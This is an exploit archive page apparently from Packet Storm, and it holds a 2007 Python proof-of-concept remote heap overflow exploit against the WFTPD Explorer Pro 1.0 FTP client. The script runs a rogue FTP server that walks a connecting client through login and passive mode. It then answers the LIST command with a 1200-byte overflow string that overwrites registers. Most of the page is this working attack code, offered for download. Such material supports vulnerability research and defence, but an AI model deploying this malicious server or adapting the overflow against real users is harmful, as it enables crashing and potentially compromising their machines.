exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WftpdExpPro_HeapPoC.py.txt

WftpdExpPro_HeapPoC.py.txt
Posted Dec 19, 2007
Authored by r4x

WFTPD Explorer Pro version 1.0 proof of concept remote heap overflow exploit.

tags | exploit, remote, overflow, proof of concept
SHA-256 | 387d7811f53450d3dd27624bbd58b40b150526f54534c793e8b8f4f85a22cfac

WftpdExpPro_HeapPoC.py.txt

Change Mirror Download
##########################################
# WftpdExpPro_HeapPoC.py #
# Discovered by r4x (Kamil Szczerba) #
# [r4xks@o2.pl] #
##########################################
# Soft : WFTPD Explorer Pro 1.0 #
# Vendor : Texas Imperial Software #
# Vuln : Heap Overwlow (Res: LIST) #
# Exploit : PoC Reg Overwrite #
##########################################
# Reg: #
# EAX = 41414141 #
# ECX = 41414141 #
# EDX = 00a57b38 ASCII "AAAA..." #
# ESI = 00a57b30 ASCII "AAAA..." #
# ------------------------------ #
# EIP = 7c91142E #
# #
# Exception c0000005 (ACCES_VIOLATION) #
# #
# MOV DWORD PTR DS:[ECX],EAX ; HEHE #
# MOV DWORD PTR DS:[EAX +4] ECX ; #
# #
# Test on: WinXPsp2 Polish #
# #
##########################################




from socket import *

heapb0f = "A" * 1200 + "r\n"

req = (
"USER",
"PASS",
"TYPE",
"PWD",
"PASV",
"LIST"
)

res = (
"331 Password required.\r\n",
"230 User logged in.\r\n",
"200 Type set to I.\r\n",
"257 '/' is current directory.\r\n",
"227 Entering Passive Mode (127,0,0,1,100,100).\r\n",
"150 Opening ASCII mode data connection for file list.\r\n",
)

def parser(buff):

cmd = buff.split("\x20")[0]
cmd1 = buff.split("\r\n")[0]
if len(cmd) > len(cmd1):
cmd = cmd1

for i in range(len(req)):
if req[i] == cmd:
return res[i]

def multiserv(port1, port2):

control = socket(AF_INET, SOCK_STREAM)
control.bind(('', port1))
control.listen(1)

trans = socket(AF_INET, SOCK_STREAM)
trans.bind(('', port2))
trans.listen(1)

while(1):
cclient, caddr = control.accept()
print "[*] Connected: ", caddr
cclient.send("220 Welcome: Evil Secure FTPD 1.666\r\n")

while(1):

r0 = cclient.recv(1024)
print "[>] Input: %s" % (r0)
r1 = parser(r0)
if r1 == None:
r1 = "502 Command not implemented.\r\n"
cclient.send(r1)
print "[<] Output: %s" % (r1)
if r1 == res[4]:
print "[*] Data mode\n"
tclient, taddr = trans.accept()
print "[*] Connected: ", taddr
if r1 == res[5]:
print "[*] b00mb!"
tclient.send(heapb0f)
print "[*] done"
break
break





multiserv(21, 25700)

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close